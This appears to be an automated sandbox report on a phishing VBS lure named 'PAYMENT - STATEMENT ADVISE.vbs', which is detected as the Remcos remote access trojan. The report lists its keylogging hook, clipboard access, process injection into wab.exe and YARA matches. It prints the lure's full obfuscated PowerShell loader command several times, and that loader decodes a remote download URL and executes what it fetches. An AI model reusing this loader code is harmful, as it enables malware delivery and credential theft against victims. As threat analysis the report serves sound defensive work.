                Source: powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: powershell.exe, 00000002.00000002.2695061689.0000019290072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: wab.exe, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041183A OpenClipboard,GetLastError,DeleteFileW,11_2_0041183A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,11_2_0040987A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004098E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_00406DFC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,13_2_00406E9F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004068B5
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,14_2_004072B5

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3271388779.0000000002A7F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: amsi32_1084.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3528, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 1084, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Sample has a suspicious name (potential lure to open the executable)
                Source: PAYMENT - STATEMENT ADVISE.vbsStatic file information: Suspicious name
                Very long command line found
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9337
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 9337
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9337Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 9337Jump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00401806 NtdllDefWindowProc_W,11_2_00401806
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004018C0 NtdllDefWindowProc_W,11_2_004018C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004016FD NtdllDefWindowProc_A,13_2_004016FD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004017B7 NtdllDefWindowProc_A,13_2_004017B7
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00402CAC NtdllDefWindowProc_A,14_2_00402CAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00402D66 NtdllDefWindowProc_A,14_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F0BEA22_2_00007FF848F0BEA2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F0B0F62_2_00007FF848F0B0F6
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240D71948_2_240D7194
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240CB5C18_2_240CB5C1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B04011_2_0044B040
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043610D11_2_0043610D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044731011_2_00447310
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044A49011_2_0044A490
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040755A11_2_0040755A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043C56011_2_0043C560
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B61011_2_0044B610
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044D6C011_2_0044D6C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004476F011_2_004476F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B87011_2_0044B870
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044081D11_2_0044081D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041495711_2_00414957
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004079EE11_2_004079EE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407AEB11_2_00407AEB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044AA8011_2_0044AA80
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00412AA911_2_00412AA9
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404B7411_2_00404B74
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404B0311_2_00404B03
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044BBD811_2_0044BBD8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404BE511_2_00404BE5
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404C7611_2_00404C76
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00415CFE11_2_00415CFE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00416D7211_2_00416D72
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00446D3011_2_00446D30
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00446D8B11_2_00446D8B
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00406E8F11_2_00406E8F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040503813_2_00405038
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041208C13_2_0041208C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004050A913_2_004050A9
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040511A13_2_0040511A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043C13A13_2_0043C13A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004051AB13_2_004051AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044930013_2_00449300
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040D32213_2_0040D322
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044A4F013_2_0044A4F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043A5AB13_2_0043A5AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041363113_2_00413631
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044669013_2_00446690
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044A73013_2_0044A730
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004398D813_2_004398D8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004498E013_2_004498E0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044A88613_2_0044A886
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043DA0913_2_0043DA09
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00438D5E13_2_00438D5E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00449ED013_2_00449ED0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041FE8313_2_0041FE83
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00430F5413_2_00430F54
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004050C214_2_004050C2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004014AB14_2_004014AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040513314_2_00405133
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004051A414_2_004051A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040124614_2_00401246
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040CA4614_2_0040CA46
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040523514_2_00405235
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004032C814_2_004032C8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040168914_2_00401689
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00402F6014_2_00402F60
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
                Source: PAYMENT - STATEMENT ADVISE.vbsInitial sample: Strings found which are bigger than 50
                Source: amsi32_1084.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3528, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 1084, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winVBS@20/13@1/3
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,11_2_004182CE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,14_2_00410DE1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,11_2_00418758
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,FindCloseChangeNotification,11_2_00413D4C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,11_2_0040B58D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Angiosperm.AfmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-VEYV6I
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqdjamr5.rdk.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3528
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1084
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: wab.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: wab.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: wab.exe, 00000008.00000002.3287311337.0000000024500000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: wab.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: wab.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: wab.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: wab.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: PAYMENT - STATEMENT ADVISE.vbsReversingLabs: Detection: 37%
                Source: PAYMENT - STATEMENT ADVISE.vbsVirustotal: Detection: 14%
                Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-33249
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"
